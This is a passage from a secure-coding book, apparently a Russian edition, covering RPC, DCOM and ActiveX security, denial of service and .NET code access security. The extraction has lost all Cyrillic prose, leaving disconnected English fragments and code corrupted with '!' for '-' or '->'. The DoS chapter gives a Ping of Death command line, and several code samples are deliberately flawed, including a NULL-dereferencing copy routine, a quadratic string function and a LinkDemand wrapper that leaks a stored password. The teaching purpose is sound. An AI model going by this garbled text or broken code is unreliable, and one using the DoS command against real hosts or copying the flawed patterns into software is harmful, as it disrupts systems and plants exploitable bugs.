RegisterIfEx RpcServerRegisterIf2 RPC_IF_ALLOW_SECU
RE_ONLY. :
, RPC_C_AUTHN_LEVEL_NONE. 
RPC_S_ACCESS_DENIED. 
. , 
, RPC 
, . 
,
. : Windows NT 4/2000 
( ) , Windows XP 
.
RPC_IF_ALLOW_SECURE_ONLY ,
RpcServerUseProtSeq, 
. , ,
LRPC. 
TCP/IP . ,
, .

RPC-

, RPC , 
. RPC 
.
, ,
.
RPC (
, RPC),
. ,
RPC: RPC1, LRPC, RPC2, 
, RPC3, LRPC, 
( , LRPC )
(. 164).

430

III

MyService.exe

MyService.exe

RPC 1

RPC 2

LRPC

RPC 3

LRPC

RPC 1

, LRPC

RPC 2

RPC 3

, LRPC

, LRPC

. 164. RPC

, , , LRPC,
RPC
, RPC
!
, 
, RpcBindingToStringBinding, 
RpcStringBindingParse 
. : 
, LRPC.

/*
Phones.cpp
*/
...
BOOL IsLRPC(void *ctx) {
BOOL fIsLRPC = FALSE;
LPBYTE pBinding = NULL;
if (RpcBindingToStringBinding(ctx, &pBinding) == RPC_S_OK) {
LPBYTE pProtSeq = NULL;
// ,
// NULL.
if (RpcStringBindingParse(pBinding,
NULL,
&pProtSeq,
NULL,
NULL,
NULL) == RPC_S_OK) {
printf(" %s\n", pProtSeq);
// ,
// LRPC.
if (lstrcmpi((LPCTSTR)pProtSeq, "ncalrpc") == 0)
fIsLRPC = TRUE;
if (pProtSeq)

16

RPC, ActiveX- DCOM

431

RpcStringFree(&pProtSeq);
}
if (pBinding)
RpcStringFree(&pBinding);
}
return flsLRPC;
}
...


,
! RPC 
RpcEpRegister .
(, RPCDump.exe Windows 2000
Resource Kit) .

RPC_BINDING_VECTOR *pBindings = NULL;


if (RpcServerInqBindings(&pBindings) == RPC_S_OK) {
if (RpcEpRegister(phone_v1_0_s_ifspec,
pBindings,
NULL,
"!") == RPC_S_OK) {
// ! !
}
}
, 
, , RPC
.


: ncacn_ip_tcp, ncacn_np
ncalrpc. 
.
RPC , GetLastError
RPC . , ,
, 5 
! .
net helpmsg nnnn, nnnn 
, .

432

III


DCOM
DCOM RPC, COM
, , RPC,
. , 
, DCOM ,
, .
. , !

DCOM
Dcomcnfg.exe. Windows NT 4 Win
dows 2000 Distributed COM Configuration Properties
(: Distributed COM), Windows XP ,
COM+ DCOM. . 165
Default Properties ( )
Distributed COM Configuration Properties Windows 2000.

. 165. Default Properties


Distributed Com Configuration Properties
, DCOM .
: ,
. , COM
(COM Internet Services). RPC HTPP,
Web RPC DCOM.
, ,
HTTP. , ,
.

16

RPC, ActiveX- DCOM

433

RPC.
Connect (), RPC_C_AUTHN_CONNECT.
Identify (), 
RPC_C_IMP_LEVEL_IDENTIFY.
Default Properties Provide additional security for
reference tracking ( ). 
COM. 
IUnknown::AddRef, IUnknown::Release.
IUnknown::AddRef, 
, , . 
, COM , 
, , IUnknown::AddRef 
,
. ,
? , 
, :
.

CoInitializeSecurity,
EOAC_SECURE_REFS dwCapabilities.
Default Security ( ) 
, . 
, , 
, 
, . 
, DCOM
. ,
, DCOM,
. 
Administrators () Power
Users ( ). , Power Users Win
dows 2000, Windows NT, , 
. 
, , , , ,
. , 
. ,
: Power Users 
, .
Windows NT 4 SP 4 Default Protocols ( 
) , DCOM.
TCP UDP
[ ConnectionOriented
TCP/IP ( TCP/IP) Datagram UDP/IP (
UDP/IP)]. DCOM 

, TCP
, .

434

III


, ,
. 
Applications () Distributed COM Confi
guration Properties , 
HKEY_LOCAL_MACHINE\Software\Classes\AppId. :
, .
, ,
, . 

,
. :
,
DLL. , 
, DCOM 
. ,
. , TCP UDP,
.
DCOM 
( 135 )
, . :
Windows 2000, , 
.
DCOM
. , 
, . , ,

.

DCOM
DCOM 
. : ,
, , SYS
TEM ( DCOM, 
) . ,
DCOM, () , 
, .
.
DCOM . 
.

,
. 
, 
. , : 
, Windows 2000,

16

RPC, ActiveX- DCOM

435

. DCOM
Windows NT 4.0,
. Windows 2000 
, 
. , ,

(window station) ,
. Platform SDK.


, ,
. ,
, DCOM 
, , 
. , 
. API
.
, , DCOM
. ,
DCOM 
, 
,
. .


DCOM 
Local System , Windows XP,
. Local System , 
. 
, , .

. DCOM 
, ( )
Identify.
. DCOM
Identify, 
CoInitializeSecurity API
Impersonate.
, Windows .NET Server
,
7.


Microsoft Transaction Server ,
. ,

436

III


. , ,
. , 
DCOM, Log on as a batch job ( 
). Dcomnfg.exe
, 
, .
, 
.
. DCOM

. ,
? : 
LSA.
: 3000 ,
. 3000 ,
. , 
,
99,9% (

1000 ). , 3000
, (0,999) 3000, 0,05.
18 , 
. ,
.
DCOM
. , 
(, ), 
.
, : 20
, 3000.
. 
. 
,
( 
). SMS (Systems Management Server) 
, .
, , 
, . 
! , , ,
, 
. , , Windows XP Windows .NET Server
LocalService NetworkService.
.

16

RPC, ActiveX- DCOM

437


DCOM
, . CoInitializeSecurity
, 
 , IlientSecurity::SetBlanket.
, COM ,
(blanket). 
, CoInitializeSecurity.

HRESULT CoInitializeSecurity(
PSECURITY_DESCRIPTOR pVoid, //
LONG cAuthSvc,
// asAuthSvc
SOLE_AUTHENTICATION_SERVICE * asAuthSvc,
//
void * pReserved1,
//
DWORD dwAuthnLevel,
//
//
DWORD dwImpLevel,
//
//
SOLE_AUTHENTICATION_LIST * pAuthList,
//
//
DWORD dwCapabilities,
//
// /
void * pReserved3
//
);
. 
: , 
(application ID, AppID) IAccessControl.
PSECURITY_DESCRIPTOR,
dwCapabilities. AppID, ,
. , 
,
.
( NULL). Platform SDK
( , , 
) , , NULL, 

dwAuthnLevel. .
. 
, cAuthSvc 1.
dwAuthnLevel,
. , 
RPC_C_AUTHN_LEVEL_PKT_PRIVACY
.
. 

, .

438

III

, . 
,
. 
,
, !
, RPC_C_IMP_LEVEL_IDENTIFY RPC_C_IMP_LE
VEL_ANONYMOUS,
.
dwCapabilities.
EOAC_STATIC_CLOAKING EOAC_DYNAMIC_CLOAKING
Windows 2000 (loaking).

, . 


. 
EOAC_SECURE_REFS.
, .
Windows 2000, EOAC_NO_CUSTOM_MAR
SHAL. DCOM 
DLL. 
EOAC_NO_CUSTOM_MARSHAL
CLSID, Ole32.dll (Component Services).
CLSID , 
COM. DCOM
(object references, OBJREF), CLSID.
CLSID
DLL. , OAC_NO_CUS
TOM_MARSHAL, CoInitializeSecurity
CLSID, CATID_Marshaler.
EOAC_DISABLE_AAA , 
, 
E_ACCESSDENIED. , 
CoInitializeSecurity, 
(, Local System),
. Windows 2000
.

DCOM (.
Secureco2\Chapter16\DCOM_Security). ATL COM App
Wizard Microsoft Visual C++ 6
DCOM, ISecurityExample,
GetServerBlanket.

STDMETHODIMP CSecurityExample::GetServerBlanket(DWORD * AuthNSvc,


DWORD * AuthZSvc,
DWORD * AuthLevel,

16

RPC, ActiveX- DCOM

439

DWORD * ImpLevel)
{
IServerSecurity* pServerSecurity;
OLECHAR* PriName;
if(CoGetCallContext(IID_IServerSecurity,
(void**)&pServerSecurity) == S_OK)
{
HRESULT hr;
hr = pServerSecurity!>QueryBlanket(AuthNSvc,
AuthZSvc,
&PriName,
AuthLevel,
ImpLevel,
NULL,
NULL);
if(hr == S_OK)
{
CoTaskMemFree(PriName);
}
return hr;
}
else
return E_NOINTERFACE;
}
, : 
, IserverSecurity 
(blanket). .
TestClient , 
, IClientSecurity::SetBlanket, 
, GetServerBlanket 
. :

Initial client security settings:


Client Security Information:
Snego security support provider
No authorization
Principal name: DAVENET\david
Auth level = Connect
Impersonation level = Identify
Set auth level to Packet Privacy
Server Security Information:
Snego security support provider

440

III

No authorization
Auth level = Packet privacy
Impersonation level = Anonymous
TestClient.exe DCOM_Secu
rity.exe . DCOM_Security.exe
DCOM_Security.exe /regserver. ,

. ,
, ,
. : 
, .


DCOM , ,
Windows 2000, 
. DCOM ,

. (connectable object).
(connection points) [
(Guy Eddon) (Henry Eddon) Inside Distributed COM
(Microsoft Press, 1998)] . 
, 
. 
, .
, 
Local System , 
. 
(sink)
. ,
. ,
, DCOM, ,
, , 
. 
.
,
( COM/DCOM). 

IDispatch::Invoke .
, ,
, , 
.

ActiveX
Microsoft COM (Component Object Model) 

16

RPC, ActiveX- DCOM

441

. COM
, 
IUnknown.
ActiveX COM,
IUnknown. IDispatch
(, Visual Basic Perl)
( , VBScript Jscript)
, Automation. ActiveX 
, 
COM,
(, Web ).


ActiveX
ActiveX 
Web
. Web ActiveX
HTML , 
HTML, (,
) ActiveX
. , Outlook 2002 ( Microsoft
Office XP) ActiveX
, , , Outlook Express Windows .NET Server 2003
Windows XP.
ActiveX , ,
, HTML (
HTML) 
ActiveX.
HTML ( Web ) Acti
veX , 
. , , 
(safe for initialization, SFI) 
(safe for scripting, SFS),
.

ActiveX-,

ActiveX
COM IPersist. 
, . 
ActiveX,

, .
, ActiveX
, , 

442

III

. , ActiveX 
, , 
Web.
, Microsoft Excel ,
, 

.
, ActiveX
.
! ActiveX , 
Authenticode. 
ActiveX
, 
.
ActiveX, .
2001 . Web,
ActiveX.
, ,
. ,
, (, )
. , ActiveX Print,
! , 
, ActiveX 
, Web, 

, 
.
, ? : Web
ActiveX,

.  , Web 
ActiveX Web, Print
.
, ActiveX
,
, .
Outlook View Control Exposes Unsafe Functionality (
Outlook
) (http://www.microsoft.com/technet/security/bulletin/MS01038.asp), Acti
ve Setup Control Vulnerability ( 
) (http://www.microsoft.com/technet/security/bulletin/MS99048.asp)
Office HTML Script and IE Script Vulnerabilities (, 
HTML Office Internet
Explorer) (http://www.microsoft.com/technet/security/bulletin/MS00049.asp).

16

RPC, ActiveX- DCOM

443

! , ActiveX,
. 
,
ActiveX, .
ActiveX 
, msdn.microsoft.com 
safe for scripting. 
!

SFI- SFS-
ActiveX, 
/ , : ActiveX
!
, , , 
. , , ActiveX
, .
, ActiveX
.
! :
, 

.
( )
,
.

ActiveX-?
, ActiveX, :
, . 
,
, :
, ,
;
(, , 
);
, 
;
;
(, 
);
,
.

444

III

 , ActiveX
. 
,
, RunCode, PrintDoc, EraseFile, Shell, Call, Write, Read
. .
: 
. , 
, ,
.
IObjectSafety. 
 ( Internet Explorer) ,
.

(. 19).


, ActiveX
, . ,
ActiveX , Web
, northwindtraders.com.
.
1. IobjectWithSite SetSite, 
(, Internet Explorer),
IUknown (
Ocidl.h). IobjectWithSite ActiveX
.
2. :

pUnk!>QueryInterface(IID_IServiceProvider, &pSP);
pSP!>QueryService(IID_IWebBrowser2, &pWB);
pWB!>getLocationURL(bstrURL);
3. , , bstrURL 
URL. . 
, , northwindtraders.com (,
) . ,
www.northwindtraders.com.foo.com! 
InternetCrackUrl Wininet.dll,
URL ( lpUrlComponent>lpszHostName),
.
(. Secureco2\Chapter 16\InternetCrackURL) 
.

/*
InternetCrackURL.cpp
*/
BOOL IsValidDomain(char *szURL, char *szValidDomain,
BOOL fRequireHTTPS) {
URL_COMPONENTS urlComp;

16

RPC, ActiveX- DCOM

445

ZeroMemory(&urlComp, sizeof(urlComp));
urlComp.dwStructSize = sizeof(urlComp);
// .
char szHostName[128];
urlComp.lpszHostName = szHostName;
urlComp.dwHostNameLength = sizeof(szHostName);
BOOL fRet = InternetCrackUrl(szURL, 0, 0, &urlComp) ;
if (fRet==FALSE) {
printf("InternetCrackURL failed ! > %d", GetLastError());
return FALSE;
}
// HTTPS, .
if (fRequireHTTPS && urlComp.nScheme != INTERNET_SCHEME_HTTPS)
return FALSE;

// ,
// .
int cbHostName = lstrlen(szHostName);
int cbValid = lstrlen(szValidDomain);
int cbSize = (cbHostName > cbValid) ? cbValid : cbHostName;
for (int i=1; i <= cbSize; i++)
if (szHostName[cbHostName ! i] != szValidDomain[cbValid ! i])
return FALSE;
return TRUE;
}
void main() {
char *szURL="https://www.northwindtraders.com/foo/default.html";
char *szValidDomain = "northwindtraders.com";
BOOL fRequireHTTPS = TRUE;
if (IsValidDomain(szURL, szValidDomain, TRUE)) {
printf(" , %s .", szURL) ;
}
}
IsValidDomain , ActiveX 
, Web,
northwindtraders.com.
,
COM msdn.microsoft.com,
Microsoft Knowledge Base, HOWTO: Tie ActiveX Controls to a
Specific Domain ( ActiveX )
(support.microsoft.com/support/kb/articles/Q196/0/61.ASP), ATL
ActiveX .

446

III

SiteLock
Windows Office
2002 . SiteLock, ATL ++, 
Web . 
SiteLock ActiveX
,
, ActiveX
. SiteLock
ActiveX, 
. 
, ActiveX
.
SiteLock
http://msdn.microsoft.com/downloads/samples/internet/components/
sitelock/default.asp.

Kill Bit
, 
ActiveX . , 
ActiveX
. Web
ActiveX :
. , . HKLM\Soft
ware\Microsoft\Internet Explorer ActiveX Compatibility, 
ActiveX (CLSID).
ActiveX,
( ), 
CLSID , REG_DWORD
Compatibility Flags 0x00000400. , .
ActiveX
, ,
ActiveX, .
Q240797 Microsoft Knowledge Base.

DCOM ActiveX RPC; , 


RPC, . , 
:
RPC /robust MIDL
SYSTEM;
DCOM SYSTEM;
ActiveX
, , , 
SiteLock.

17

(Denial of Service, DoS) 


. , ,
, .
DoS
. 
DoS, ,
, :
, , 
. DoS , .
DoS,
:
/ ;
;
;
;
.

,
DoS, , 
. 
. UDP
(UDP bomb) SunOS 4.x. UDP
, ,
. ,

448

III

(, UNIX , Windows
),
.
ping (Ping of Death), 
IP. DoS
. IPv4:

struct ip_hdr
{
unsigned char ip_version:4,
ip_header_len:4;
unsigned char ip_type_of_service;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_offset;
unsigned char ip_time_to_live;
unsigned char ip_protocol;
unsigned short ip_checksum;
struct in_addr ip_source, ip_destination;
};
ip_len .
(unsigned short) 65 535, 
65 535 . ip_offset 
.
, , 
, .
0, : 
, . 13 
.
8 , 65 535 .
? ,
( 65 535).
, 
216.
, , ping (Ping
of Death), 
, , http://www.insecure.org/sploits/pingodeath.html.
,
, . , 
:  ,

ping l 65510 <IP >


Microsoft Windows 95/NT 
UNIX Linux, .
? ,
, .

17

449


. , DoS, 
, , ,
.
.

/*
,

*/
#include <winsock2.h>
#include <list>
using namespace std;
// .
// .
// .
struct ip_hdr
{
unsigned char ip_version:4,
ip_header_len:4;
unsigned char ip_type_of_service;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_offset;
unsigned char ip_time_to_live;
unsigned char ip_protocol;
unsigned short ip_checksum;
struct in_addr ip_source, ip_destination;
};
typedef list<ip_hdr> FragList;
bool ReassemblePacket(FragList& frags, char** outbuf)
{
// , ,
// .
// ,
// .
unsigned long packetlen = 0;
// ""
// .
unsigned short last_offset;
unsigned short datalen;
ip_hdr Packet;
//

450

III

// .
// .
Packet = frags.back();
// , 8 .
// .
last_offset = (Packet.ip_offset & 0x1FFF) * 8;
// , ,
// !
datalen = Packet.ip_len ! Packet.ip_header_len * 4;
// unsigned long
// .
packetlen = (unsigned long)last_offset + (unsigned long)datalen;
// packetlen unsigned short,
// :
// offset = 0xfff0;
// datalen = 0x0020;
// total = 0x10010
// 0x0010
// true,
// unsigned short 0xffff.
if(packetlen > 0xffff)
{
// !! !
return false;
}
// .
// ...
return true;
}
: 
. ,
,
Microsoft Office .

/* */
struct UNICODE_STRING
{
WCHAR* buf;
unsigned short len;
unsigned short max_len;

17

451

};
void CopyString(UNICODE_STRING* pStr)
{
WCHAR buf[20];
// ?
if(pStr!>len < 20)
{
memcpy(buf, pStr!>buf, pStr! >len * sizeof(WCHAR));
}
// ! .
}
, ,
NULL. 
, . :
, . ,
RPC ,
. ,
pStr>buf NULL. , 
.

,
(
) . ,
. , 
: c:\\foo.txt 
, c:\foo.txt . , 
, 
? (.
Secureco2\Chapter17\CPUDoS):

/*
CPU_DoS_Example.cpp


.
.
.
*/
#include <windows.h>
#include <stdio.h>
#include <assert.h>
/*

452

III

,
.

.
true, .
*/
// , buf .
bool StripBackslash1(char* buf)
{
char* tmp = buf;
bool ret = false;
for(tmp = buf; *tmp != '\0'; tmp++)
{
if(tmp[0] == '\\' && tmp[1] == '\\')
{
//
// strcpy,
// !
// , .
// !
// .
strcpy(tmp, tmp+1);
ret = true;
}
}
return ret;
}
/*
.
!
,
.
*/
bool StripBackslash2(char* buf)
{
unsigned long len, written;
char* tmpbuf = NULL;
char* tmp;
bool foundone = false;
len = strlen(buf) + 1;
if(len == 1)
return false;

17

tmpbuf = (char*)malloc(len);
// , ! .
if(tmpbuf == NULL)
{
assert(false);
return false;
}
written = 0;
for(tmp = buf; *tmp != '\0'; tmp++)
{
if(tmp[0] == '\\' && tmp[1] == '\\')
{
// .
foundone = true;
}
else
{
tmpbuf[written] = *tmp;
written++;
}
}
if(foundone)
{
//
// strncpy
// null.
// tmp
// .
strncpy(buf, tmpbuf, written);
buf[written] = '\0';
}
if(tmpbuf != NULL)
free(tmpbuf);
return foundone;
}
int main(int argc, char* argv[])
{
char* input;
char* end = "foo";
DWORD tickcount;
int i, j;
// .
for(i = 10; i < 10000001; i *= 10)

453

454

III

{
input = (char*)malloc(i);
if(input == NULL)
{
assert(false);
break;
}
// .
// , "foo".
// 2 input[j],
// "foo\0".
for(j = 0; j < i ! 5; j += 3)
{
input[j] = '\\';
input[j+1] = '\\';
input[j+2] = 'Z';
}
// , j
// .
strncpy(input + j, end, 4);
tickcount = GetTickCount();
StripBackslash1(input);
printf("StripBackslash1: = %d , = %d \n",
i, GetTickCount() ! tickcount);
// !
// .
for(j = 0; j < i ! 5; j += 3)
{
input[j] = '\\';
input[j+1] = '\\';
input[j+2] = 'Z';
}
// , j
// .
strncpy(input + j, end, 4);
tickcount = GetTickCount();
StripBackslash2(input);
printf("StripBackslash2: = %d , = %d \n",
i, GetTickCount() ! tickcount);
free(input);
}
return 0;
}

17

455

CPU_DoS_Example.cpp
. main
. StripBackslash1
, 
: 
. StripBackslash2 
, 
,
. . 171 .

17-1. CPU_DoS_Example.cpp


StripBackslash1,


StripBackslash2,

10

100

1000

10 000

111

100 000

11 306

1 000 000

2 170 160

20

, ,
10 000 . 1 . , 
36 Pentium III ( 800 ).
,
.
, 
StripBackslash2 , 
. , 
.
GetTickCount 0
1 . , 
, 
, . 
StripBackslash1 StripBackslash2
,
. Strip
Backslash2 ,
. ,
,
DoS.

. , 
, ,
, DoS.
StripBackslash3.

456

III

bool StripBackslash3(char* str)


{
char* read;
char* write;
// .
assert(str != NULL);
if(strlen(str) < 2)
{
// .
return false;
}
// .
for(read = write = str + 1; *read != '\0'; read++)
{
// ,
// ,
// write, read .
if(*read == '\\' && *(read ! 1) == '\\')
{
continue;
}
else
{
*write = *read;
write++;
}
}
// .
*write = '\0';
return true;
}

, 19, 
,
Microsoft Visual Studio, .
,
. 
. , 
. 
: .
.
, , . 

17

457

, , ( 
)  , ,
, 
. , , 
, Profiler.
Visual Studio 6 Project 
Settings Link. Category
General, Enable Profiling OK.
Profile. 
, 1000 ( ,
, ), , :

Profile: Function timing, sorted by time


Date: Sat May 26 15:12:43 2001

Program Statistics

Command line at 2001 May 26 15:12:


"D:\DevStudio\MyProjects\CPU_DoS_Example\Release\CPU_DoS_Example"
Total time: 7.822 millisecond
Time outside of functions: 6.305 millisecond
Call depth: 2
Total functions: 3
Total hits: 7
Function coverage: 100.0%
Overhead Calculated 4
Overhead Average 4
Module Statistics for cpu_dos_example.exe
!
Time in module: 1.517 millisecond
Percent of time in module: 100.0%
Functions in module: 3
Hits in module: 7
Module function coverage: 100.0%
Func
Func+Child
Hit
Time %
Time
% Count Function
!
1.162 76.6
1.162 76.6
3 StripBackslash1(char *)
(cpu_dos_example.obj)
0.336 22.2
1.517 100.0
1 _main
(cpu_dos_example.obj)
0.019 1.3
0.019 1.3
3 StripBackslash2(char *)
(cpu_dos_example.obj)
Profiler , GetTickCount ,
, Profiler
StripBackslash1 StripBack

458

III

slash2.
100 ,
. , 10 , StripBack
slash2 StripBackslash1.
100 StripBackslash2 StripBackslash1. 
,
, , 
. 
, 
. 

DoS. , , 
, StripBackslash3,
StripBackslash2 StripBackslash3 (. 172).

17-2.

StripBackslash2 StripBackslash3

StripBackslash2, %

StripBackslash3, %

1000

2,5

1,9

1,32

10 000

16,7

14,6

1,14

100 000

33,6

23,3

1,44

1 000 000

46,6

34,2

1,36

. , StripBackslash2 .
,

,
.
,
. , . 
,
, 
. ,
, : 
DoS , 
.
Profiler Visual Studio .NET,
Web http://
go.microsoft.com/fwlink/?Linkid=7256.
, ,
 Compuware.

17

459

,
.

. 
new, ,
. : 
, InitializeCriticalSection EnterCriticalSection,
Windows XP/.NET Server EnterCriticalSection . :

, .
(David Meltzer) , 
Internet Security Systems. , 
Windows NT 4 Terminal Server Edition 
( Microsoft Knowledge Base 
http://support.microsoft.com/support/kb/articles/
Q238/6/00.ASP). , 
, 
. Terminal Server (
, ), 
( )
 . 
, 
, .
,
.

,

. ,
. 
. Windows NT 
LSA  LSA_HANDLE.
, 
LSA, . 
2048 LSA,

.
LSA ,
. ,
.

, , ; 
, . 
: 

460

III

, , ,
.
.
 ,
. : ,
.
, 
. 
, ,
; 
, .
! ?
 .
? , 
Terminal Services 
, 
. , 
.

. : IPv6
IP, .
IPv4 IPv6
, .

. , ,
.
, ,
. ,
, .

, 
, . 
SYN (SYN flood) Microsoft:
, , ,
.
Microsoft [ SMB (Server Message Block) NetBIOS]
. ,
. 
. , ,
. 
, , 
, .
TLS (Transport Level Security), 
, 2001 USENIX
Security Conference. Using Client Puzzles to Protect TLS
(Drew Dean) Xerox PARC

17

461

(Adam Stubblefield) (Rice University).


.
USENIX,
http://www.usenix.org/publications/library/proceedings/sec01/dean.html.

.
.

.

,

, , 
, echo chargen
( ). ,
. 

. UDP,
TCP. , , 
chargen, echo
? 
, echo chargen.
, 
,
,
. ,
, chargen echo,
Windows NT 4 Windows,
. , 
, , 
chargen.
chargen echo
( 1024), .
, ,
, UDP 135 
Windows NT Windows NT.
RPC (RPC endpoint mapping service).
,
. , , 

. 
. ,
. 
.

462

III

DoS
.
,
. , 
, 
, 
. , ,
, 
, , ICMP (Internet Control Message Protocol) UDP. 
, 
, .

DoS,
.
.
, , 
, 
DoS 
.

. , 

. 

.
 ,

. , 
, ,
.

18

.NET

. Microsoft
Professional Developers Conference ( 2001 .), 
, , 
.NET Framework .
, SQL,
C++ C#, , .
( 
C C++) ,
, 
. , 
.NET.
? , Microsoft
.NET, , 
, 
. , 
, , 

CLR (Common Language Runtime), Web XML.
,
, , :
(web.config);

, System. Security. Cryp
tography;
, .

464

III

CLR .NET ,
, 
, ActiveX. 
Microsoft Windows
. ,
,
, .
(restricted token) Windows 2000
( 7).
.NET :
,
(
 ) ,
.
, ,

. , ( 
,
) , 
, .
Web:
Web (, ) 
, . .NET 


. , 
, Web.
,
, , 
.NET, 
. , 
, .
.
: . !
.NET ,
.
! CLR , ,
. 
, .

,
(Code Access Security, CAS) .NET.

18 .NET

465


, 
.NET CLR. , ,
. ,
, .NET Framework Security (.
).
, CAS
: . :
, ,
(. 181).
,


?

. 181.

,


?

: ,
,
. 
. , (. 182).


,
,


. 182. , ,
,
, CAS! 
CAS. . 183.

466

III

,


?


,
,

. 183.

CAS

, 
 , , 
, . . 184,
CAS.
Assert()

Deny()

PermitOnly()



, ,


,

1990

. 184.

, CAS,
, .

: FxCop

, FxCop (
http://www.gotdotnet.com), 
. FxCop , 

18 .NET

467

.NET .NET .NET


Framework Design Guidelines (http://msdn.microsoft.com/library/enus/cpgenref/ html/
cpconnetframeworkdesignguidelines.asp).
. 
, , FxCop ,
, , 
. . 185
FxCop.
FxCop XML .
, 
:

<?xml version=1.0"?>
:

<?xml!stylesheet href=C:\Program Files\Microsoft


FxCop\Xml\violationsreport.xsl
type=text/xsl?>

. 185.

FxCop

, FxCop 
. 
.



. 
excel.exe, ? . , 

468

III

, ,
, Microsoft Excel.  ,
Microsoft Excel? .NET 
,
, , 
.
,
sn.exe. :

SN !k keypair.snk
keypair.snk , 
. ( 
; ,
.) 
, 
, .
, ,
, Authenticode. ,
, .
, .
, , ,
. 
,  ,
, 
, , ,
.
Authen
ticode, . 
, Authenticode.
, Authenticode
, , .
! ,
,
. 
, 
.

1024
RSA.
:

SN !p keypair.snk public.snk
, . 
, ,
:

18 .NET

469

[assembly: AssemblyKeyFile(<____>)]
Visual Studio .NET
AssemblyInfo.cs AssemblyInfo.vb. Visual Basic .NET :

Imports System.Reflection
<Assembly: AssemblyKeyFileAttribute("c:\keys\keypair.snk")>
, 
 .
, , 
, . ,
:

SN !R <_>.dll keypair.snk

, . 
:

SN !Vr <_>.dll
! ,
.
, Visual Basic .NET
:

<Assembly: AssemblyDelaySignAttribute(true)>
C# :

[assembly: AssemblyDelaySign(true)]

, 
.

ASP.NET
,  Web,
(global assembly cache, GAC) 
.NET Configuration (Mscor
cfg.msc) gacutil.exe.
ASP.NET.


, CLR .NET 
, . 
, 
. De
mand, CLR , , 

470

III

. . 
(stack walk).
, , 
, 
, .

?
.NET.
, ,
, , ,
. 
.


, 
, .
, 
 . 
, .
, ,
.

, . 
, FileIOPermission 
, :

[assembly: FileIOPermission(SecurityAction.RequestMinimum,
Read = @"c:\files\inventory.xml")]

.

RequestMinimum. 
, Policy
Exception .


, 
, , 
. , 
,
:

[assembly: FileIOPermission(SecurityAction.RequestRefuse, Unrestricted = true)]


[assembly: EnvironmentPermission(SecurityAction.RequestRefuse, Unrestricted = true)]

18 .NET

471


, , ,
( ),
.


CLR 
, , ,
.
 . 
,
FileIOPermission.
,
. :

[assembly: FileIOPermission(SecurityAction.RequestOptional, Unrestricted = true)]


, 
, , ,
. 
, :

[assembly: PermissionSet(SecurityAction.RequestOptional, Unrestricted = false)]


:

(PermMaximum (PermMinimum PermOptional)) ! PermRefused


, 
, , .


, , , 
C# Visual Basic .NET .
(declarative permissions).
. 
(imperative permissions) 
. 
, :

new FileIOPermission(FileIOPermissionAccess.Read,
@"c:\files\inventory.xml").Demand();
, 
XML. 
, 
.
. 
. 
Permissions View (permview);

472

III

/decl.
, 
.
,
.

caspol !a ! resolveperm myassembly.exe



. permview .NET Framework SDK,
.

Assert
Assert CLR
, , 
. Assert, : ,
. ,
.
! CLR CodeAccessPermission.Assert 
assert C C++ Debug.Assert
.NET Framework.
, .
,
, / . ,
,
.
, : ,
. Assert , 

. ,
USB, UsbFileStream FileStream.
, USB API Win32, ,

, / (FileIOPermission). 
UsbFileStream UnmanagedCode ( Win32
API) FileIOPermission, , 
/.
, (
, ) , .
, ../../boot.ini?
? , ,

18 .NET

473

(ACL) , 
FAT.

Assert, , , Assert
Demand Demand, . ,

.
, 
.

! ,
SecurityPermissionFlag.Un
managedCode; 
.

Demand Assert
Demand Assert 
. 
, ,
, . : 
, 
, SecurityPermissionFlag.Assertion.
.
, FileIOPermission,
, .
FileIOPermission, ,
.
, Demand
. 

EmailAlertPermission,
. , 
.
! ,
Demand, . ,
Main ,
, . 
,
Demand 
*, SecurityManager. IsGranted,

. . .

474

III

, (
).
Main,
! , 
, 
.

! 
, .
. , Environ
mentPermission Environment . GetEnvironmentVariable,
.NET Framework .
, . 
,
, ,
EmailAlertPermission ( 
), , SMTP, 
SocketPermission. 
,
, SocketPermission.

UnmanagedCode
.
,
, , 
.
UnmanagedCode? .

, .
: 
.
FileIOPermission .
:
, , .
.
SecurityPermission. :

[SecurityPermission(SecurityAction.Assert,UnmanagedCode=true)]
Assert .
, ,
, :

try {
PermissionSet ps =
new PermissionSet(PermissionState.Unrestricted);

18 .NET

475

ps.AddPermission(new FileDialogPermission
(FileDialogPermissionAccess.Open));
ps.AddPermission(new FileIOPermission
(FileIOPermissionAccess.Read,@"c:\files"));
ps.Assert();
} catch (SecurityException e) {
// ! .
}



, , 
CodeAccessPermission. RevertAssert, , 
Assert. 
; , ,
.
C# , , 
.
,
SMTP,
.

using
using
using
using

System;
System.Net;
System.Security;
System.Security.Permissions;

// ;
// .
static void SendAlert(string alert) {
//
// .
new EmailAlertPermission(
EmailAlertPermission.Send).Demand();
//
// SMTP!.
NetworkAccess na = NetworkAccess.Connect;
TransportType type = TransportType.Tcp;
string host = "mail.northwindtraders.com";
int port = 25;
new SocketPermission(na, type, host, port).Assert();
try {
SendAlertTo(host, port, alert);
} finally {
// ,

476

III

CodeAccessPermission.RevertAssert();
}
}
Assert, Deny PermitOnly ,
Deny, Assert
PermitOnly.
, A() B(),
C(), A() ReflectionPermission.
C() ReflectionPermission , , 
, . ? , ,
Assert, 
A(). , .

private string filename = @"c:\files\fred.txt";


private void A() {
new FileIOPermission(
FileIOPermissionAccess.AllAccess,filename).Deny();
B();
}
private void B() {
C();
}
private void C() {
try {
new FileIOPermission(
FileIOPermissionAccess.AllAccess,filename).Assert();
try {
StreamWriter sw = new StreamWriter(filename);
sw.Write("!");
sw.Close();
} catch (IOException e) {
Console.Write(e.ToString());
}
} finally {
CodeAccessPermission.RevertAssert();
}
Assert C(), SecurityException 
StreamWriter  .

Demand LinkDemand
,
. .NET Framework
, ,
, . ,
System . IO. File FileIOPermission 

18 .NET

477

. FileIOPermission File, 
.
, 
.
LinkDemand JIT
(justintime)
. , 
.
LinkDemand , 
(luring atack),

. LinkDemand ,
,
. .

- LinkDemand
. .

[PasswordPermission(SecurityAction.LinkDemand, Unrestricted=true)]
[RegistryPermissionAttribute(SecurityAction.PermitOnly,
Read=@"HKEY_LOCAL_MACHINE\SOFTWARE\AccountingApplication")]
public string returnPassword() {
return (string)Registry
.LocalMachine
.OpenSubKey(@"SOFTWARE\AccountingApplication\")
.GetValue("Password");
}
...
public string returnPasswordWrapper() {
return returnPassword();
}
, , ,
, ,
. returnPassword, 
PasswordPermission. returnPassword, 
,
. returnPasswordWrapper
LinkDemand returnPasswordWrapper 
returnPassword
returnPassword, . ! ,
returnPasswordWrapper, .
LinkDemand JIT
,
, .
: LinkDemand
. ,
. ,

478

III

LinkDemand,
, ,
.
, , LinkDemand
 ? ,
LinkDemand , , 
.
! LinkDemand
